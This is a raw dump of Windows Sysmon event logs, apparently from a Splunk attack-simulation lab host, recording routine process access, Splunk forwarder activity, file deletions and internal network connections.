18:14:13.749{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085039Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:13.749{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085038Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:13.749{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085037Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:13.749{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4EF5-613A-5290-03000000C801}5544C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085036Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:13.749{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085035Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:13.749{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4EF5-613A-5290-03000000C801}5544C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085034Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:13.734{B81B27B7-4EF5-613A-5290-03000000C801}5544C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035085033Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:13.533{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D301D9BA7AA78D13C55EEE937EBE05A7,SHA256=DCA9F6A547B3144285917D9168445DFBD4241CF4F84A435AFDA3DF0821CD27C5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085032Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:13.317{B81B27B7-4EF5-613A-5190-03000000C801}58642788C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085031Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:13.165{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4EF5-613A-5190-03000000C801}5864C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085030Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:13.165{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085029Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:13.165{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085028Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:13.165{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085027Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:13.165{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085026Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:13.165{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4EF5-613A-5190-03000000C801}5864C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085025Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:13.165{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4EF5-613A-5190-03000000C801}5864C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085024Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:13.150{B81B27B7-4EF5-613A-5190-03000000C801}5864C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035085023Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:13.065{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22BC9C692AF0A1C04B98E6F37BA2470E,SHA256=9B33286D5A9F65326C446369C835ACF8DAAA565B7F4B3CE92F948D53CD270533,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085045Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:38.536{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56688-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085044Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:14.184{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BF780A266475B26DF45F1F93A4F49B0B,SHA256=1DF7CC580AEEABAF877163613D421FA80FCF30A6F6F54F30CA0EA2919B324FC0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085043Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:14.183{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2DF46D507CFE146215792D3C267B62A8,SHA256=71EEDC96EA44BAF96C8A41C3BFB2AF03D0A3E90474617CA8F3C241C2743A0A8E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085042Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:14.164{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F98F95645F495F4A4EC85A598B3E915F,SHA256=81D8DD82A012C70D4673031C666E7628856C8CDC5AD3599C681AC5A0947CFDC1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085046Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:15.185{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82064DD402016AC91DA89239FB01D0D9,SHA256=706A9606BF2455B9E234C8F2BD1B04B490351C2E0FB13D5661F4D44BEFD5368B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085047Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:16.362{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2195626F987E7F6BD106485A569BC174,SHA256=0968291F832AE72F4EDBCE57DB1FA7D0EBC09F20C4A64C60441FEF816D543E5E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085048Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:17.378{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77D0F79BF0DC035B137EBC039B4EEDC8,SHA256=6BE819A9561D15CD48011ADD3670FA7F20683D854D4FBF389B663683E800B937,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085051Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:18.759{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3E519B79672BE0D1C06BC32F7A0F00EE,SHA256=63D2397E51D0E1A1DC911E040DB247BE52EBDEAC1EC4D7FD46E0C42D6F342E7C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085050Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:18.428{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE6F443DB9C676DB4E87114E7C0A431C,SHA256=6E8F74506C78ED5416C0009EE41B8FE1AC98109369C4449C49A030417E7CB405,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085049Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:42.203{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56689-false10.0.1.12-8000- 354300x800000000000000035085053Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:43.552{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56690-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085052Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:19.459{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03E7DE40AC92633F0224CA7109E56C4D,SHA256=5D9AB7D035AC7DCD277C7DD290D2BE724C3A9AAD2B2C738166BAD6DC5666B918,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085054Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:20.476{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=193ED7AB061E899B0DD9564462A6A052,SHA256=673DF3AE1BE61035FE1C420B60605BEBFCA3F72F9A112B4D60276106DF2721A1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085055Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:21.494{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29E1C0DA4B555B6F9C95953BC2F3C56F,SHA256=58DE4A77DB20F19DFE3714EF68A9A6AF21B055D152A10FA9D00CCDECCF890EB7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085056Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:22.527{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04B343217A4B671ACDD17F0F649E8888,SHA256=5092BD197386FD8096A9F8E07321E406D34CB08F72C70BFA58C6F4DA238A94A9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085058Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:23.541{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D48DAED0D36FFF2477D756D44A6171FE,SHA256=D4D870C2CDE4334AE33E2EF7343382875302D3BE21A375E8D47DFCEECACA97BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085057Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:48.116{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56691-false10.0.1.12-8000- 23542300x800000000000000035085060Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:24.609{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=29B601C5F49BFD4C38C4135C53C4FCE8,SHA256=046F8A05EB731C40CE5F5ACE2C14E315E312A13E96174F78D3EC67733FCCA8D1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085059Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:24.573{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9C3D66FB885B7E695C7D2C346DFD746,SHA256=CEBCFF2009F5F13868EB76C5A211C10E596D06B54AC7654BE8B4909B27F858ED,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085062Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:25.576{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA8714EF1E57E2B5A565910B6DB0B88B,SHA256=7E6C75964301EE9F0AD8A2F3D1BA135D1BC2CEA4AF3268DB083628D83B765EF6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085061Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 